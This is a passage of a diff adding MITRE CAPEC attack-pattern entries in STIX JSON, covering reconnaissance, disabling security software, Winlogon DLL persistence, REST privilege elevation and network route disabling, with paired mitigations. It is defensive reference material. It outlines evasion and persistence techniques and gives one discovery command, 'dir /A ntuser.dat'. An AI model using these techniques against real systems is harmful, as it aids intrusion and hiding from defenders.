+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "spec_version": "2.1", + "target_ref": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \"dir /A ntuser.dat\". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. This time is synonymous with the last time that user was logged in.", + "external_references": [ + { + "external_id": "CAPEC-577", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/577.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Owner/User Discovery", + "external_id": "T1033", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1033" + } + ], + "id": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Owner Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.", + "Administrator permissions are required to view the home folder of other users." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper permissions on files and folders are enacted to limit accessibility.", + "id": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-577-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d75f4c7-4ed6-4b8d-92af-9a3ef1ed2ea7", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--583c7488-8859-4641-9143-4a55cfb23722", + "spec_version": "2.1", + "target_ref": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to disable security tools so that detection does not occur. This can take the form of killing processes, deleting registry keys so that tools do not start at run time, deleting log files, or other methods.", + "external_references": [ + { + "external_id": "CAPEC-578", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/578.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Modify Authentication Process: Multi-Factor Authentication", + "external_id": "T1556.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1556/006" + }, + { + "description": "Impair Defenses: Disable or Modify Tools", + "external_id": "T1562.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/001" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Disable or Modify System Firewall", + "external_id": "T1562.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/004" + }, + { + "description": "Impair Defenses: Disable or Modify Cloud Firewall", + "external_id": "T1562.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/007" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + }, + { + "description": "Impair Defenses: Safe Mode Boot", + "external_id": "T1562.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/009" + } + ], + "id": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Disable Security Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_consequences": { + "Availability": [ + "Hide Activities (By disabling certain security tools, the adversary can hide malicious activity and avoid detection.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the capability to interact with the configuration of the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools.", + "id": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-578-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99491706-558f-487d-aa01-04a8b8b5a6f5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1b899d-d3f2-4d8f-807f-c8a13d7c193c", + "spec_version": "2.1", + "target_ref": "attack-pattern--a2f42e82-a184-4df7-a8bb-6fc34787d571", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.", + "external_references": [ + { + "external_id": "CAPEC-579", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/579.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Boot or Logon Autostart Execution: Winlogon helper DLL", + "external_id": "T1547.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547/004" + } + ], + "id": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Replace Winlogon Helper DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c9851cf-e6d2-463b-a389-c4c108572a95", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "spec_version": "2.1", + "target_ref": "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.", + "external_references": [ + { + "external_id": "CAPEC-58", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/58.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "description": "Mark O'Neill, Security for REST Web Services, Vprde;", + "external_id": "REF-463", + "source_name": "reference_from_CAPEC", + "url": "http://www.vordel.com/downloads/rsa_conf_2006.pdf" + } + ], + "id": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Restful Privilege Elevation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_example_instances": [ + "The HTTP Get method is designed to retrieve resources and not to alter the state of the application or resources on the server side. However, developers can easily code programs that accept a HTTP Get request that do in fact create, update or delete data on the server. Both Flickr (http://www.flickr.com/services/api/flickr.photosets.delete.html) and del.icio.us (http://del.icio.us/api/posts/delete) have implemented delete operations using standard HTTP Get requests. These HTTP Get methods do delete data on the server side, despite being called from Get which is not supposed to alter state." + ], + "x_capec_extended_description": "\n Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker needs to be able to identify HTTP Get URLs. The Get methods must be set to call applications that perform operations other than get such as update and delete." + ], + "x_capec_skills_required": { + "Low": "It is relatively straightforward to identify an HTTP Get method that changes state on the server side and executes against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8f217ad-8701-4a9c-9a22-a4c6022c4f51", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP Get methods only retrieve state and do not alter state on the server side", + "id": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09b1f116-7e91-47fc-8238-758d20861790", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b77def1e-db69-4204-b59f-c9ba934af034", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose", + "id": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-58-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a8f4717-a1fc-4334-8819-fadd7bafdf0f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f4d6165-fc50-42ef-9249-e1052676d841", + "spec_version": "2.1", + "target_ref": "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ec163f5-ff75-4e9d-ac8d-0bd09b3e9121", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "spec_version": "2.1", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b970172-c7e3-45aa-a1de-1362a7f5756c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may attempt to get a listing of security tools that are installed on the system and their configurations. This may include security related system features (such as a built-in firewall or anti-spyware) as well as third-party security software.", + "external_references": [ + { + "external_id": "CAPEC-581", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/581.html" + }, + { + "description": "Software Discovery:Security Software Discovery", + "external_id": "T1518.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1518/001" + } + ], + "id": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Security Software Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-581-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--679fbac3-8799-4a09-948f-0d9e83b3765f", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "spec_version": "2.1", + "target_ref": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-14T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \"Internet kill switch\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.", + "external_references": [ + { + "external_id": "CAPEC-582", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/582.html" + } + ], + "id": "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route denies the availability of a service.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08" + ], + "x_capec_prerequisites": [ + "The adversary requires knowledge of and access to network route." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems..", + "id": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-583-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52c0fc53-41a5-4784-b605-f2404b5643c9", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "spec_version": "2.1", + "target_ref": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.", + "external_references": [ + { + "external_id": "CAPEC-584", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/584.html" + }, + { + "description": "Why is it Taking so Long to Secure Internet Routing?, 2014, ACM", + "external_id": "REF-465", + "source_name": "reference_from_CAPEC", + "url": "https://queue.acm.org/detail.cfm?id=2668966" + }, + { + "description": "Beware of BGP Attacks, 2004, ACM SIGCOMM", + "external_id": "REF-466", + "source_name": "reference_from_CAPEC", + "url": "http://www.cc.gatech.edu/~dovrolis/Papers/ccr-bgp.pdf" + } + ], + "id": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "modified": "2020-12-17T00:00:00.000Z", + "name": "BGP Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route at the routing infrastructure level denies availability of that route.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped." + ], + "x_capec_prerequisites": [ + "The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince" + ], + "x_capec_resources_required": [ + "BGP Router" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.", + "id": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76b92e8e-8863-490a-a6e4-c241e602b86e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "spec_version": "2.1", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography.", + "id": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf5fc63-f216-4101-9b1b-a09e8272547c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 